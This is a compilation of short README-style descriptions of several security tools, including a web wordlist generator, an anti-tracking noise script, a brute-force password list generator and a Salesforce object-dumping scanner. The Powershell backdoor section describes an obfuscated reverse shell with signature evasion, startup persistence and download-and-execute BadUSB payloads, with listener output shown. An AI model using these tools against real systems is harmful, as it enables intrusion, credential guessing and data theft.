WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.

• [x] Scan Static Files.
• [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
• [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.

Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads

Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL convers   ion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory

Features

• Hak5 Rubber Ducky payload
• Flipper Zero payload
• Download Files from remote system
• Fetch target computers public IP address
• List local users
• Find Intresting Files
• Get OS Information
• Get BIOS Information
• Get Anti-Virus Status
• Get Active TCP Clients
• Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.

Payloads

• Execute -- Execute the backdoor
• BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted

┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

To Do

• Add Standard Backdoor
• Find Writeable Directories
• Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0

PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking

PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.

• Simple. 3 files only, no installation required, just clone this repo an you're ready to go.
• Powerful. Thread-based navigation.
• Stealthy. Optimized to emulate user navigation.
• Portable. You can use this script on every unix-based OS.

This project was inspired by noisy.py

How It Works

1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
2. If proxy flag has been used, proxy config will be tested
3. For each URL in ULR-list a thread is started, each thread as an user agent associated
4. Each thread will start by sending an HTTP request to the given URL
5. The response if filtered using the keywords in order to prevent 404s and malformed URLs
6. A new URL is choosen from the list generated after filering
7. Current thread sleeps for a random time
8. Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key)

Features

• Configurable urls list and blocklist
• Random DNS Mode : each request is done on a different DNS Server
• Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf)
• Error recovery mechanism to protect Engines from failures
• Spoofed User Agent prevent from fingerprinting (each engine has a different user agent)
• Dynamic UI

Setup

Clone the repository:

git clone https://github.com/realtho/PartyLoud.git

Navigate to the directory and make the script executable:

cd PartyLoud
chmod +x partyloud.sh

Run 'partyloud':

./partyloud.sh

Usage

Usage: ./partyloud.sh [options...]

-d --dns <file>                    DNS Servers are sourced from specified FILE,
                                   each request will use a different DNS Server
                                   in the list
                                   !!WARNING THIS FEATURE IS EXPERIMENTAL!!
                                   !!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file>               read URL list from specified FILE
-b --blocklist <file>              read blocklist from specified FILE
-p --http-proxy <http://ip:port>   set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait                       disable wait between one request and an other
-h --help                          dispaly this help

To stop the script press either enter or CRTL-C

 

File Specifications

In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub

Intro

If you don’t have special needs , default config files are just fine to get you started.

Default files are located in:

• badwords
• partyloud.conf
• DNSList

Please note that file name and extension are not important, just content of files matter

badwords - Keywords-based blocklist

badwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:

partyloud.conf - ULR List

partyloud.conf is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you.

Note #1 - To work properly the URLs must be well-formed

Note #2 - Even if the file contains 1000 lines only 10 are used (first 10, working on randomness)

Note #3 - Only one URL per line is allowed

DNSList - DNS List

DNSList is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the “default file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness.

Note #1 - Only one address per line is allowed

Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns

psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.

Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
	{'a' : '@'},
	{'b' : '8'},
	{'e' : '3'},
	{'g' : ['9', '6']},
	{'i' : ['1', '!']},
	{'o' : '0'},
	{'s' : ['$', '5']},
	{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.

Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

• salesforce
• contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest

Help:

cirrusgo --help

  ______ _                           ______
 / ____/(_)_____ _____ __  __ _____ / ____/____
/ /    / // ___// ___// / / // ___// / __ / __ \
/ /___ / // /   / /   / /_/ /(__  )/ /_/ // /_/ /
\____//_//_/   /_/    \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL>           Define single URL to fuzz
-l, --list		  Show App List
-c, --check               only check endpoint
-V, --version             Show current version
-h, --help                Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL>           Define single URL
-c, --check               only check endpoint
-lobj, --listobj          pull the object list.
-gobj --getobj            pull the object.
-obj --objects            set the object name. Default value is "User" object.
                          Juicy Objects: Case,Account,User,Contact,Document,Cont
                             entDocument,ContentVersion,ContentBody,CaseComment,Not
                          e,Employee,Attachment,EmailMessage,CaseExternalDocumen
                          t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord          pull the Record id.
-re --recordid            set the recode id to dump the record
-cw --chkWritable         check all Writable objects
-f, --full                dump all pages of objects.
--dump
-H, --header <HEADER>     Pass custom header to target
-proxy, --proxy <URL>     Use proxy to fuzz

-o, --output <FILE>       File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload      Generator payload for test manual Default "ObjectList"

GetItems                -obj set object
                        -page set page
                        -pages set pageSize
GetRecord 	           -re set recoder id 
WritableOBJ             -obj set object  
SearchObj               -obj set object 
                        -page set page
                        -pages set pageSize
AuraContext             -fwuid set UID 
                        -App set AppName
                        -markup set markup                        
ObjectList               no options
Dump                     no options		 
-h, --help               Display its help 

Example :

cirrusgo salesforce -u https://loclhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw